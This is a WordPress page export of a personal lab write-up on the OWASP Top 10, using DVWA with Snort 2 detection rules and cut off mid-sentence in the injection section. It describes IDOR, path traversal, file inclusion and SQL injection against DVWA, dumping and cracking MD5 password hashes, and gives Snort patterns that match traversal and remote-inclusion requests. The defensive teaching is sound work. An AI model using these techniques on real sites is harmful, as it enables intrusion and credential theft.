{"id":832,"date":"2024-03-16T00:51:00","date_gmt":"2024-03-16T00:51:00","guid":{"rendered":"https:\/\/victorcoil.tech\/?page_id=832"},"modified":"2026-04-19T16:15:59","modified_gmt":"2026-04-19T16:15:59","slug":"owasp-top-10-and-snort-rule-creation","status":"publish","type":"page","link":"https:\/\/victorcoil.tech\/?page_id=832","title":{"rendered":"OWASP Top 10 and Snort Rule Creation"},"content":{"rendered":"\n<div class=\"wp-block-group is-layout-constrained wp-block-group-is-layout-constrained wp-container-1 is-position-sticky\"><div id=\"guten-8C0d8I\" class=\"guten-element guten-nav-menu nav-menu break-point-tablet submenu-click-title \" data-item-indicator=\"fas fa-angle-down\" data-item-indicator-type=\"icon\" data-item-indicator-svg=\"\" data-close-on-click=\"1\" aria-label=\"\">\n\t\t\t<div class=\"gutenverse-hamburger-wrapper\">\n\t\t\t\t<button class=\"gutenverse-hamburger-menu\" aria-label=\"\">\n\t\t\t\t<i aria-hidden=\"true\" class=\"fas fa-bars\"><\/i>\n\t\t\t\t<\/button>\n\t\t\t<\/div>\n\t\t\t\n\t\t\t<div class=\"gutenverse-menu-wrapper\"><div class=\"gutenverse-menu-container\"><ul id=\"menu-owasp-top-10-w-dvwa-and-snort\" class=\"gutenverse-menu\"><li id=\"menu-item-872\" class=\"menu-item-872  menu-item menu-item-type-custom menu-item-object-custom\"><a href=\"javascript:void(0);\" data-href=\"https:\/\/victorcoil.tech\/?page_id=832\/#SnortRules\" aria-label=\"Snort Rules\">Snort Rules<\/a><\/li>\n<li id=\"menu-item-873\" class=\"menu-item-873  menu-item menu-item-type-custom menu-item-object-custom\"><a href=\"javascript:void(0);\" data-href=\"https:\/\/victorcoil.tech\/?page_id=832\/#OWASP10\" aria-label=\"OWASP Top 10\">OWASP Top 10<\/a><\/li>\n<li id=\"menu-item-874\" class=\"menu-item-874  menu-item menu-item-type-custom menu-item-object-custom\"><a href=\"javascript:void(0);\" data-href=\"https:\/\/victorcoil.tech\/?page_id=832\/#DVWA\" aria-label=\"Setting Up DVWA\">Setting Up DVWA<\/a><\/li>\n<\/ul><\/div>\n\t\t\t\t<div>\n\t\t\t\t\t<div class=\"gutenverse-nav-identity-panel\">\n\t\t\t\t\t\t<div class=\"gutenverse-nav-site-title\">\n\t\t\t\t\t\t\t<a aria-label=\"\" href=\"https:\/\/victorcoil.tech\" class=\"gutenverse-nav-logo\"><\/a>\n\t\t\t\t\t\t<\/div>\n\t\t\t\t\t\t<button class=\"gutenverse-close-menu\" aria-label=\"\"><i aria-hidden=\"true\" class=\"fas fa-times\"><\/i><\/button>\n\t\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t<\/div>\n\t\t<\/div><\/div>\n\n\n\n<div class=\"wp-block-group has-zeever-bgsoft-background-color has-background is-layout-constrained wp-container-core-group-is-layout-22177b6a wp-block-group-is-layout-constrained\" style=\"padding-top:100px;padding-bottom:100px\">\n<div class=\"wp-block-columns is-layout-flex wp-container-core-columns-is-layout-28f84493 wp-block-columns-is-layout-flex\">\n<div class=\"wp-block-column is-layout-flow wp-block-column-is-layout-flow\">\n<div class=\"wp-block-group has-zeever-bgsoft-background-color has-background is-layout-flow wp-block-group-is-layout-flow\">\n<div class=\"wp-block-columns is-layout-flex wp-container-core-columns-is-layout-28f84493 wp-block-columns-is-layout-flex\">\n<div class=\"wp-block-column is-layout-flow wp-block-column-is-layout-flow\" id=\"SnortRules\">\n<h2 class=\"wp-block-heading has-text-align-left is-style-lineseparator zeever-animate zeever-move-right zeever-delay-1 has-zeever-primary-color has-text-color has-heading-2-font-size\">Snort Rules<\/h2>\n\n\n\n<h2 class=\"wp-block-heading has-text-align-left zeever-animate zeever-move-right zeever-delay-3 has-zeever-secondary-color has-text-color has-tiny-font-size\" style=\"font-style:normal;font-weight:500;text-transform:uppercase\">Basic SNort Rule format<\/h2>\n<\/div>\n\n\n\n<div class=\"wp-block-column is-layout-flow wp-block-column-is-layout-flow\"><\/div>\n<\/div>\n<\/div>\n\n\n\n<div class=\"wp-block-group zeever-animate zeever-move-up zeever-delay-3 has-zeever-bgsoft-background-color has-background is-layout-constrained wp-container-core-group-is-layout-32cee7d8 wp-block-group-is-layout-constrained\" style=\"padding-top:40px\">\n<div class=\"wp-block-columns is-layout-flex wp-container-core-columns-is-layout-28f84493 wp-block-columns-is-layout-flex\">\n<div class=\"wp-block-column is-style-customborderbottomhover zeever-animate zeever-move-up zeever-delay-1 has-black-background-color has-background is-layout-flow wp-block-column-is-layout-flow\" style=\"padding-top:50px;padding-right:40px;padding-bottom:50px;padding-left:40px\">\n<h2 class=\"wp-block-heading has-text-align-left has-zeever-primary-color has-text-color has-heading-3-font-size\" style=\"margin-top:20px;font-style:normal;font-weight:600\">DVWA Download<\/h2>\n\n\n\n<p>You can follow along with how I did it or look at the official GitHub and see what other possibilities\/changes you can make to DVWA.<\/p>\n\n\n\n<p><a href=\"https:\/\/github.com\/digininja\/DVWA\" target=\"_blank\" rel=\"noopener\" title=\"\">https:\/\/github.com\/digininja\/DVWA<\/a><\/p>\n<\/div>\n\n\n\n<div class=\"wp-block-column is-style-customborderbottomhover zeever-animate zeever-move-up zeever-delay-3 has-black-background-color has-background is-layout-flow wp-block-column-is-layout-flow\" style=\"padding-top:50px;padding-right:40px;padding-bottom:50px;padding-left:40px\">\n<h2 class=\"wp-block-heading has-text-align-left has-zeever-primary-color has-text-color has-heading-3-font-size\" style=\"margin-top:20px;font-style:normal;font-weight:600\">Lab Brief Summary<\/h2>\n\n\n\n<p class=\"has-text-align-left has-zeever-bodytext-color has-text-color\">Configured the DVWA webserver with Snort IPS to demonstrate OWASP Top 10. Will bring up easily understandable vulnerabilities and their respective mitigation strategies, correlated with each category. I have also developed tailored Snort rules for the applicable vulnerabilities.<\/p>\n<\/div>\n\n\n\n<div class=\"wp-block-column is-style-customborderbottomhover zeever-animate zeever-move-up zeever-delay-5 has-black-background-color has-background is-layout-flow wp-block-column-is-layout-flow\" style=\"padding-top:50px;padding-right:40px;padding-bottom:50px;padding-left:40px\">\n<h2 class=\"wp-block-heading has-text-align-left has-zeever-primary-color has-text-color has-heading-3-font-size\" style=\"margin-top:20px;font-style:normal;font-weight:600\">Additional Helpful Links<\/h2>\n\n\n\n<p><a href=\"https:\/\/docs.snort.org\/rules\/\" target=\"_blank\" rel=\"noopener\" title=\"\">Snort 3 Rules Manual<\/a><\/p>\n\n\n\n<p><a href=\"http:\/\/manual-snort-org.s3-website-us-east-1.amazonaws.com\/node27.html\" target=\"_blank\" rel=\"noopener\" title=\"\">Snort 2 Rules Manual<\/a><\/p>\n\n\n\n<p><a href=\"https:\/\/www.pcre.org\/original\/doc\/html\/pcrepattern.html\" target=\"_blank\" rel=\"noopener\" title=\"\">PCRE (Regex) Manual<\/a><\/p>\n\n\n\n<p><a href=\"https:\/\/www.w3schools.com\/tags\/ref_urlencode.ASP\" target=\"_blank\" rel=\"noopener\" title=\"\">HTML URL Encoding Reference<\/a><\/p>\n\n\n\n<p><a href=\"https:\/\/owasp.org\/Top10\/\" target=\"_blank\" rel=\"noopener\" title=\"\">OWASP Top 10<\/a><\/p>\n<\/div>\n<\/div>\n<\/div>\n<\/div>\n<\/div>\n\n\n\n<p><\/p>\n\n\n\n<p>This lab was originally going to focus on Snort rule creation, but I decided to include examples and scenarios to help me remember the OWASP Top 10. As well as using Damn Vulnerable Web Application (DVWA) to illustrate these examples.<\/p>\n\n\n\n<p>First, I want to go over how a Snort rule is structured. I used Snort 2 in this lab. You will usually find the rules as one line, but I like to use the backslashes (\u201c\\\u201d) at the end of the rule options to make a new line and help make it more readable. Snort 3 does not require backslashes, as it ignores whitespace.<\/p>\n\n\n\n<p>The rule below is to alert on a Path Traversal on a URL that contains specific content. I will be using this rule to explain the format.<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code><strong>alert TCP any any -> any 80<\/strong> (\\\nMsg: \"Possible Path Traversal attempt 2\";\\\nuricontent:\"\/vulnerability\/fi\/?page=\";\\\ncontent:\"..\/\";\\\nsid: 1000028;\\\nrev:1;\\\n)\n\n# The above as a one-liner would be this\n\n<strong>alert TCP any any -> any 80<\/strong> (Msg: \"Possible Path Traversal attempt 2\"; uricontent:\"\/vulnerability\/fi\/?page=\"; content:\"..\/\"; sid: 1000028; rev:1;)<\/code><\/pre>\n\n\n\n<p><\/p>\n\n\n\n<p>The first line is the &#8220;Rule Header&#8221;. <\/p>\n\n\n\n<pre class=\"wp-block-code\"><code><strong>alert TCP any any -&gt; any 80<\/strong><\/code><\/pre>\n\n\n\n<p><\/p>\n\n\n\n<p>The first component is the \u201crule action,\u201d and there are a handful of actions that you can use. The keyword \u201calert\u201d will create a log and alert us. Other options, like \u201cdrop,\u201d which drops the captured packet, and \u201cBlock,\u201d which drops all packets in the same flow, can be used. More options can be found in the Snort Manuals I have linked to at the beginning.<\/p>\n\n\n\n<p>After the rule action, you can put the \u201cprotocol.\u201d In this case, the rule looks for \u201cTCP\u201d packets. This field can have UDP, IP, HTTP, HTTPS, SSH, SSL, etc.<\/p>\n\n\n\n<p>After the protocol, will be the \u201cExternal Address and its port.\u201d In the case of this rule, \u201cany\u201d IP Address with \u201cany\u201d port is considered external.<\/p>\n\n\n\n<p>After that is the \u201cdirection operator\u201d. This indicates the rule for the direction in which traffic is flowing. So, in this case, it is external TO the home network. You can do FROM (&lt;-) and Bidirectional (&lt;>).<\/p>\n\n\n\n<p>As mentioned before, the home network is to the right of the direction operator. I recommend that the home network&#8217;s address match the actual IP address of the system you&#8217;re trying to defend, not just &#8220;any.&#8221;<\/p>\n\n\n\n<p><\/p>\n\n\n\n<p>The rest of the Rule is known as the \u201cbody,\u201d which is shown below.<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>(\nMsg: \"Possible Path Traversal attempt 2\";\\\nuricontent:\"\/vulnerability\/fi\/?page=\";\\\ncontent:\"..\/\";\\\nsid: 1000028;\\\nrev:1;\\\n)<\/code><\/pre>\n\n\n\n<p><\/p>\n\n\n\n<p>Usually, you will see this format: with \u201cMsg\u201d (Message) at the top, which is a short description of the rule and is helpful for those who look at the alerts.<\/p>\n\n\n\n<p>After the msg comes to the real rule options, which are many, I will not go through them all, but in the rules I created for this lab, I will use content, uricontent, http_uri, http_method, pcre, flow, and detection_filter.<\/p>\n\n\n\n<p>The rule above uses \u201curicontent\u201d and \u201ccontent.\u201d It\u2019s a fairly simple rule that checks whether \u201c\/vulnerability\/fi\/?page=\u201d is present in the URI. It will also look to see if \u201c..\/\u201d is inside the content of that packet.<\/p>\n\n\n\n<p>After that comes the SID and Rev. The SID is the unique number for the Snort rule, and the Rev is the revision number. These two should be used together when creating Snort rules. <\/p>\n\n\n\n<p>I did mention other options, but I will cover those in the later rules when the options are discussed.<\/p>\n\n\n\n<p><\/p>\n\n\n\n<p>Below are the rules listed; you can click on them and jump to where they are on this page.<\/p>\n\n\n\n<div class=\"wp-block-group has-zeever-bgsoft-background-color has-background is-vertical is-layout-flex wp-container-core-group-is-layout-c35747d5 wp-block-group-is-layout-flex\">\n<ul class=\"wp-block-list\">\n<li><a href=\"#SnortPT\" title=\"\">Path traversal<\/a><\/li>\n<\/ul>\n\n\n\n<ul class=\"wp-block-list\">\n<li><a href=\"#SnortPT2\" title=\"\">Path Traversal 2<\/a><\/li>\n<\/ul>\n\n\n\n<ul class=\"wp-block-list\">\n<li><a href=\"#SnortRFI\" title=\"\">Remote File Inclusion<\/a><\/li>\n<\/ul>\n\n\n\n<ul class=\"wp-block-list\">\n<li><a href=\"#SnortSQL\" title=\"\">SQL Injection<\/a><\/li>\n<\/ul>\n\n\n\n<ul class=\"wp-block-list\">\n<li><a href=\"#BlindSQL\" title=\"\">Blind SQL Injection<\/a><\/li>\n<\/ul>\n<\/div>\n\n\n\n<div class=\"wp-block-group has-zeever-bgsoft-background-color has-background is-vertical is-layout-flex wp-container-core-group-is-layout-c35747d5 wp-block-group-is-layout-flex\">\n<ul class=\"wp-block-list\">\n<li><a href=\"#SnortCommand\" title=\"\">Command Injection<\/a><\/li>\n<\/ul>\n\n\n\n<ul class=\"wp-block-list\">\n<li><a href=\"#SnortReflected\" title=\"\">Reflected XSS<\/a><\/li>\n<\/ul>\n\n\n\n<ul class=\"wp-block-list\">\n<li><a href=\"#SnortDOM\" title=\"\">DOM XSS<\/a><\/li>\n<\/ul>\n\n\n\n<ul class=\"wp-block-list\">\n<li><a href=\"#SnortStored\" title=\"\">Stored XSS<\/a><\/li>\n<\/ul>\n\n\n\n<ul class=\"wp-block-list\">\n<li><a href=\"#SnortBrute\" title=\"\">Brute Force Password Attack<\/a><\/li>\n<\/ul>\n<\/div>\n<\/div>\n\n\n\n<div class=\"wp-block-group has-zeever-bgsoft-background-color has-background is-layout-constrained wp-container-core-group-is-layout-22177b6a wp-block-group-is-layout-constrained\" style=\"padding-top:100px;padding-bottom:100px\">\n<div class=\"wp-block-columns is-layout-flex wp-container-core-columns-is-layout-28f84493 wp-block-columns-is-layout-flex\">\n<div class=\"wp-block-column is-layout-flow wp-block-column-is-layout-flow\">\n<div id=\"OWASP10\" class=\"wp-block-group is-layout-flow wp-block-group-is-layout-flow\">\n<div class=\"wp-block-columns has-zeever-bgsoft-background-color has-background is-layout-flex wp-container-core-columns-is-layout-28f84493 wp-block-columns-is-layout-flex\">\n<div class=\"wp-block-column is-layout-flow wp-block-column-is-layout-flow\">\n<h2 class=\"wp-block-heading has-text-align-left is-style-lineseparator zeever-animate zeever-move-right zeever-delay-1 has-zeever-primary-color has-text-color has-heading-2-font-size\">OWASP Top 10<\/h2>\n\n\n\n<h2 class=\"wp-block-heading has-text-align-left zeever-animate zeever-move-right zeever-delay-3 has-zeever-secondary-color has-text-color has-tiny-font-size\" style=\"font-style:normal;font-weight:500;text-transform:uppercase\">Categories with Examples and Rules<\/h2>\n<\/div>\n\n\n\n<div class=\"wp-block-column is-layout-flow wp-block-column-is-layout-flow\"><\/div>\n<\/div>\n<\/div>\n\n\n\n<p><\/p>\n\n\n\n<p>I won\u2019t be going too in-depth, as many categories have 20+ CWEs or Weaknesses mapped. However, I will mention some common weaknesses I usually recall when considering a category. I will list the Categories below if you want to jump to a specific one.<\/p>\n\n\n\n<ol class=\"wp-block-list\">\n<li><a href=\"#BAC\" title=\"\">Broken Access Control<\/a><\/li>\n\n\n\n<li><a href=\"#Crypto\" title=\"\">Cryptographic Failures<\/a><\/li>\n\n\n\n<li><a href=\"#Injections\" title=\"\">Injections<\/a><\/li>\n\n\n\n<li><a href=\"#InsecureDesign\" title=\"\">Insecure Design<\/a><\/li>\n\n\n\n<li><a href=\"#SecMisConf\" title=\"\">Security Misconfiguration<\/a><\/li>\n\n\n\n<li><a href=\"#vulnComp\" title=\"\">Vulnerable and Outdated Components<\/a><\/li>\n\n\n\n<li><a href=\"#IAM\" title=\"\">Identification and Authentication Failures<\/a><\/li>\n\n\n\n<li><a href=\"#SoftData\" title=\"\">Software and Data Integrity Failures<\/a><\/li>\n\n\n\n<li><a href=\"#SecLog\" title=\"\">Security Logging and Monitoring Failures<\/a><\/li>\n\n\n\n<li><a href=\"#SSRF\" title=\"\">Server-Side Request Forgery<\/a><\/li>\n<\/ol>\n\n\n\n<p><\/p>\n\n\n\n<div class=\"wp-block-group has-zeever-bgsoft-background-color has-background is-layout-constrained wp-block-group-is-layout-constrained\">\n<h3 class=\"wp-block-heading\" id=\"BAC\">1. Broken Access Control <\/h3>\n\n\n\n<p><strong>     A. IDOR (Insecure Direct Object reference)<\/strong><\/p>\n\n\n\n<p>A typical example of broken access control is IDOR (insecure direct object reference).<\/p>\n\n\n\n<p>IDOR can allow you to view or modify another user account. As shown below, a URL may contain a unique key\/number tied to a user account. In this example, imagine this being the ending of a URL, and the unique ID is 1, which belongs to a user named \u201cnormie.\u201d<\/p>\n\n\n\n<p><strong>\u201c&#8230;account=1?Name=normie\u201d<\/strong><\/p>\n\n\n\n<p>Just by replacing the Unique ID with a 0<\/p>\n\n\n\n<p><strong>\u201c&#8230;account=0?Name=normie\u201d<\/strong><\/p>\n\n\n\n<p>Then, sending a new request or pressing \u201cEnter\u201d lets you take over that account, enabling you to view and modify anything the user can access.<\/p>\n\n\n\n<p><strong>&nbsp;\u201c&#8230;account=0?Name=Admin\u201d<\/strong><\/p>\n\n\n\n<p>This is extremely oversimplified, but it can help paint the picture.<\/p>\n\n\n\n<p><\/p>\n\n\n\n<p>      B. Path Traversal \/ Local File Inclusion \/ Remote File Inclusion<\/p>\n\n\n\n<p>I will be combining these three common examples.<\/p>\n\n\n\n<p>These examples can be seen as outside the scope of an application\u2014in this case, outside what DVWA should have access to read and execute.<\/p>\n\n\n\n<p>I usually see path traversal and LFI as the same. Path traversal\u2019s unique trait is that it uses dots and slashes (\u201c..\/..\/\u201d) to move through directories, whereas LFI can use either a relative or an absolute path. However, it can also use dots and slashes. Both can read files and execute malicious scripts, executables, or backdoors.<\/p>\n\n\n\n<p>Below is an example of a path traversal vulnerability. In this case, it is reading and returning a file, which is clearly out of scope for the DVWA server.<\/p>\n\n\n\n<figure class=\"wp-block-image aligncenter size-full\"><img decoding=\"async\" width=\"646\" height=\"462\" src=\"https:\/\/victorcoil.tech\/wp-content\/uploads\/2024\/03\/FilePathTraversal.png\" alt=\"\" class=\"wp-image-834\" srcset=\"https:\/\/victorcoil.tech\/wp-content\/uploads\/2024\/03\/FilePathTraversal.png 646w, https:\/\/victorcoil.tech\/wp-content\/uploads\/2024\/03\/FilePathTraversal-300x215.png 300w\" sizes=\"(max-width: 646px) 100vw, 646px\" \/><\/figure>\n\n\n\n<p>Below is an example of a Local file inclusion. We can see that the dots and slashes were unnecessary and that we could instead use the absolute path.<\/p>\n\n\n\n<figure class=\"wp-block-image aligncenter size-full\"><img decoding=\"async\" width=\"590\" height=\"422\" src=\"https:\/\/victorcoil.tech\/wp-content\/uploads\/2024\/03\/localFileInclusion.png\" alt=\"\" class=\"wp-image-835\" srcset=\"https:\/\/victorcoil.tech\/wp-content\/uploads\/2024\/03\/localFileInclusion.png 590w, https:\/\/victorcoil.tech\/wp-content\/uploads\/2024\/03\/localFileInclusion-300x215.png 300w\" sizes=\"(max-width: 590px) 100vw, 590px\" \/><\/figure>\n\n\n\n<p>Then, here is an example of a remote file inclusion. Here, instead of opening a file locally, we&#8217;re trying to get a file remotely.<\/p>\n\n\n\n<figure class=\"wp-block-image aligncenter size-full\"><img decoding=\"async\" width=\"603\" height=\"35\" src=\"https:\/\/victorcoil.tech\/wp-content\/uploads\/2024\/03\/remotefileinclusion.png\" alt=\"\" class=\"wp-image-836\" srcset=\"https:\/\/victorcoil.tech\/wp-content\/uploads\/2024\/03\/remotefileinclusion.png 603w, https:\/\/victorcoil.tech\/wp-content\/uploads\/2024\/03\/remotefileinclusion-300x17.png 300w\" sizes=\"(max-width: 603px) 100vw, 603px\" \/><\/figure>\n\n\n\n<figure class=\"wp-block-image aligncenter size-full\"><img decoding=\"async\" width=\"592\" height=\"409\" src=\"https:\/\/victorcoil.tech\/wp-content\/uploads\/2024\/03\/remotefileinclusion2.png\" alt=\"\" class=\"wp-image-837\" srcset=\"https:\/\/victorcoil.tech\/wp-content\/uploads\/2024\/03\/remotefileinclusion2.png 592w, https:\/\/victorcoil.tech\/wp-content\/uploads\/2024\/03\/remotefileinclusion2-300x207.png 300w\" sizes=\"(max-width: 592px) 100vw, 592px\" \/><\/figure>\n\n\n\n<p><\/p>\n\n\n\n<p>Many of the risks associated with these vulnerabilities can be reduced by following the principle of least privilege. This principle involves ensuring that the permissions on all files and directories are secure and that all applications and people have ONLY the necessary permissions to do their tasks.<\/p>\n\n\n\n<p>In the case of DVWA, the \u201cFile inclusion\u201d module was secured by hard-coding the names of the files to be included in the code, eliminating any attack vectors. OWASP recommends the same and removes any user input.<\/p>\n\n\n\n<p>In the case of IDOR, it is recommended that identifiers be kept out of URLs and POST requests, and that access control checks be implemented for anything the user tries to access.<\/p>\n\n\n\n<p><\/p>\n\n\n\n<p><strong>Snort rules<\/strong><\/p>\n\n\n\n<p>I made two simple Snort rules to detect path traversal, as seen in the image below. They work. However, some things about the two are essential to know.<\/p>\n\n\n\n<figure class=\"wp-block-image aligncenter size-full\"><img decoding=\"async\" width=\"735\" height=\"179\" src=\"https:\/\/victorcoil.tech\/wp-content\/uploads\/2024\/03\/snortRuleOutputTraversal.png\" alt=\"\" class=\"wp-image-838\" srcset=\"https:\/\/victorcoil.tech\/wp-content\/uploads\/2024\/03\/snortRuleOutputTraversal.png 735w, https:\/\/victorcoil.tech\/wp-content\/uploads\/2024\/03\/snortRuleOutputTraversal-300x73.png 300w\" sizes=\"(max-width: 735px) 100vw, 735px\" \/><\/figure>\n\n\n\n<p><\/p>\n\n\n\n<p id=\"SnortPT\">This first rule checks whether the HTTP Method is \u201cGET.\u201d If it is, it will check for a \u201c..\/\u201d anywhere in the URI. You will notice that the formatting is a bit weird with this rule, but it is how Snort reads it. Placing the \u201ccontent\u201d elsewhere will have Snort scream at you when you attempt to test your configurations.<\/p>\n\n\n\n<p>To better understand it, we can start with the first &#8220;content&#8221; and read it as&#8230;<\/p>\n\n\n\n<p>&#8220;I&#8217;m looking for &#8220;GET.&#8221;<\/p>\n\n\n\n<p>Where do you want me to look? &#8220;In the http_method&#8221;<\/p>\n\n\n\n<p>I&#8217;m looking for &#8220;..\/&#8221;<\/p>\n\n\n\n<p>Where am I looking for this? &#8220;in the http_uri&#8221;<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>alert TCP any any -&gt; any 80 (\\\nmsg: \"Possible Path Traversal attempt\";\\\ncontent: \"GET\";\\ \nhttp_method;\\\ncontent: \"..\/\";\\\nhttp_uri:\\\nsid: 1000027;\\\nrev:1;\\\n)<\/code><\/pre>\n\n\n\n<p><\/p>\n\n\n\n<p id=\"SnortPT2\">For this second rule, which I used to explain the format of Snort rules.<\/p>\n\n\n\n<p id=\"SnortPT2\">It examines the specific URL and finds content within it that matches \u201c..\/.\u201d<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>alert TCP any any -&gt; any 80 (\\\nMsg: \"Possible Path Traversal attempt 2\";\\\nuricontent:\"\/vulnerability\/fi\/?page=\";\\\ncontent:\"..\/\";\\\nsid: 1000028;\\\nrev:1;\\\n)<\/code><\/pre>\n\n\n\n<p>The first rule can detect path traversals across multiple URLs because it reads the GET request. The downside is that it will generate many false positives.<\/p>\n\n\n\n<p>The second rule focuses on a single URL, resulting in fewer false positives.<\/p>\n\n\n\n<p><\/p>\n\n\n\n<p id=\"SnortRFI\">The third rule I want to mention in this section is shown below. It can be used to detect remote file inclusions. Like the last rule, it focuses on 1 URL.<\/p>\n\n\n\n<p>This is the first rule where I use PCRE. It\u2019s regex. I put it so that it follows the URL we\u2019re looking at and checks whether it&#8217;s HTTP or HTTPS. The \u201c?\u201d after HTTPS tells Snort, \u201cThere may or may not be an \u2018S\u2019 here.\u201d The hex numbers after \u201chttps?\u201d are just \u201c:\/\/.\u201d When it comes to PCRE, I recommend having the HTML Encoding Tables on the side.<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>alert TCP any any -&gt; any 80 (\\\nmsg: \"Possible Remote File Inclusion attempt\";\\\nuricontent:\"\/vulnerability\/fi\/?page=\";\\\npcre:\u201d\/\\?page=https?\\x3a\\x2f\\x2f\/i\u201d;\\\nsid: 1000029;\\\nrev:1;\\\n)<\/code><\/pre>\n<\/div>\n\n\n\n<p><\/p>\n\n\n\n<div class=\"wp-block-group has-zeever-bgsoft-background-color has-background is-layout-constrained wp-block-group-is-layout-constrained\">\n<h3 class=\"wp-block-heading\" id=\"Crypto\">2. Cryptographic Failures<\/h3>\n\n\n\n<p>The second category, as the title says, is when cryptography fails or is unused. This can happen with data in transit, at rest, or in use.&nbsp;<\/p>\n\n\n\n<p>     A. Insecure data transmission, also known as \u201cdata in transit,\u201d can be done using insecure protocols, such as HTTP, FTP, and SMTP.&nbsp;<\/p>\n\n\n\n<p>Now, DVWA does not have a specific section for this vulnerability, but the website is built using HTTP, which allows login credentials to be transmitted in plaintext. Below is a picture of Wireshark capturing the DVWA credentials.<\/p>\n\n\n\n<figure class=\"wp-block-image aligncenter size-full\"><img decoding=\"async\" width=\"742\" height=\"456\" src=\"https:\/\/victorcoil.tech\/wp-content\/uploads\/2024\/03\/plainPassWire.png\" alt=\"\" class=\"wp-image-840\" srcset=\"https:\/\/victorcoil.tech\/wp-content\/uploads\/2024\/03\/plainPassWire.png 742w, https:\/\/victorcoil.tech\/wp-content\/uploads\/2024\/03\/plainPassWire-300x184.png 300w\" sizes=\"(max-width: 742px) 100vw, 742px\" \/><\/figure>\n\n\n\n<p>It is important to use HTTPS instead of HTTP to avoid this type of exposure. I won\u2019t go into changing the entire unsecured website to a secure version. Still, in a scenario where you did have HTTPS running. Inside your \/etc\/apache2\/sites-available\/ folder, you will find the HTTPS configuration files. Inside the configuration, you can specify which protocols the site will use (e.g., which versions of SSL and\/or TLS) and which Ciphers. Only strong protocols and ciphers should be listed, as listing weak ones can lead to a downgrade vulnerability.<\/p>\n\n\n\n<p>B. Data at rest is when sensitive information is on disk or in a database, not being used and not being sent across the wire. It is best practice to store the password hash rather than the password in plaintext. I still have not touched on it, but an SQL injection can be performed in DVWA, exposing the table that stores the username and password hashes.<\/p>\n\n\n\n<figure class=\"wp-block-image aligncenter size-full\"><img decoding=\"async\" width=\"446\" height=\"222\" src=\"https:\/\/victorcoil.tech\/wp-content\/uploads\/2024\/03\/atrestPass.png\" alt=\"\" class=\"wp-image-841\" srcset=\"https:\/\/victorcoil.tech\/wp-content\/uploads\/2024\/03\/atrestPass.png 446w, https:\/\/victorcoil.tech\/wp-content\/uploads\/2024\/03\/atrestPass-300x149.png 300w\" sizes=\"(max-width: 446px) 100vw, 446px\" \/><\/figure>\n\n\n\n<p>&nbsp;The result shown above is after running the SQL injection. We can get an MD5 hash, which can be easily cracked online for free.<\/p>\n\n\n\n<figure class=\"wp-block-image aligncenter size-full\"><img decoding=\"async\" width=\"826\" height=\"385\" src=\"https:\/\/victorcoil.tech\/wp-content\/uploads\/2024\/03\/atrestHashCracked.png\" alt=\"\" class=\"wp-image-842\" srcset=\"https:\/\/victorcoil.tech\/wp-content\/uploads\/2024\/03\/atrestHashCracked.png 826w, https:\/\/victorcoil.tech\/wp-content\/uploads\/2024\/03\/atrestHashCracked-300x140.png 300w, https:\/\/victorcoil.tech\/wp-content\/uploads\/2024\/03\/atrestHashCracked-768x358.png 768w\" sizes=\"(max-width: 826px) 100vw, 826px\" \/><\/figure>\n\n\n\n<p>This leads to\u2026 making sure that the hashing algorithms in use are not deprecated and are strong, preferably those with salting. MariaDB supports modern hashing algorithms such as Argon2id, bcrypt, and PBKDF2, which automatically salt passwords.<\/p>\n\n\n\n<p>C. Data in use is data in memory that is being used by an application. To reduce the risk of exposure, you would also want to use strong salted hashes or tokenization instead of plaintext information when the data is in use. That way, even if an attacker got their hands on it, it would be rendered useless because they don\u2019t have the secret key or the mappings.<\/p>\n\n\n\n<p><\/p>\n<\/div>\n\n\n\n<div class=\"wp-block-group has-zeever-bgsoft-background-color has-background is-layout-constrained wp-block-group-is-layout-constrained\">\n<h3 class=\"wp-block-heading\" id=\"Injections\">3. Injections<\/h3>\n\n\n\n<p>Injections is the category where I created the majority of my Snort rules. I won&#8217;t teach SQL, Bash, PowerShell, or JavaScript in this section.<\/p>\n\n\n\n<p>Usually, when thinking of injections, you will think of user input fields, like login pages and URLs, that do not sanitize the user input. But know that many more vectors exist and can be used.<\/p>\n\n\n\n<p>The first type of injection I\u2019m going to cover is SQL Injections. In DVWA, we get a scenario that asks us to input a user ID to retrieve a user\u2019s first name and Surname. The goal of this section is to obtain the users&#8217; passwords\/hashes.<\/p>\n\n\n\n<p>For low and high difficulty levels, we can input the ID, then escape the query using a single quotation mark, followed by the malicious query. The only difference between high and low difficulty is that, in high difficulty, the developer tries to redirect you to a second page to log in.<\/p>\n\n\n\n<p>Use the query shown in the image below. It can be used in Low and High. <\/p>\n\n\n\n<figure class=\"wp-block-image aligncenter size-full\"><img decoding=\"async\" width=\"379\" height=\"335\" src=\"https:\/\/victorcoil.tech\/wp-content\/uploads\/2024\/03\/SQLLow-1.png\" alt=\"\" class=\"wp-image-914\" srcset=\"https:\/\/victorcoil.tech\/wp-content\/uploads\/2024\/03\/SQLLow-1.png 379w, https:\/\/victorcoil.tech\/wp-content\/uploads\/2024\/03\/SQLLow-1-300x265.png 300w\" sizes=\"(max-width: 379px) 100vw, 379px\" \/><\/figure>\n\n\n\n<figure class=\"wp-block-image aligncenter size-full\"><img decoding=\"async\" width=\"766\" height=\"401\" src=\"https:\/\/victorcoil.tech\/wp-content\/uploads\/2024\/03\/SQLHigh.png\" alt=\"\" class=\"wp-image-915\" srcset=\"https:\/\/victorcoil.tech\/wp-content\/uploads\/2024\/03\/SQLHigh.png 766w, https:\/\/victorcoil.tech\/wp-content\/uploads\/2024\/03\/SQLHigh-300x157.png 300w\" sizes=\"(max-width: 766px) 100vw, 766px\" \/><\/figure>\n\n\n\n<p>The medium difficulty replaces the input field with a drop-down menu. You can simply inspect the web page and replace the value of the shown option in the drop-down menu with your query.<\/p>\n\n\n\n<figure class=\"wp-block-image aligncenter size-full\"><img decoding=\"async\" width=\"578\" height=\"624\" src=\"https:\/\/victorcoil.tech\/wp-content\/uploads\/2024\/03\/SQLMed.png\" alt=\"\" class=\"wp-image-913\" srcset=\"https:\/\/victorcoil.tech\/wp-content\/uploads\/2024\/03\/SQLMed.png 578w, https:\/\/victorcoil.tech\/wp-content\/uploads\/2024\/03\/SQLMed-278x300.png 278w\" sizes=\"(max-width: 578px) 100vw, 578px\" \/><\/figure>\n\n\n\n<p>The impossible level has the queries parameterized. This basically means that user input is separated from the query being run, 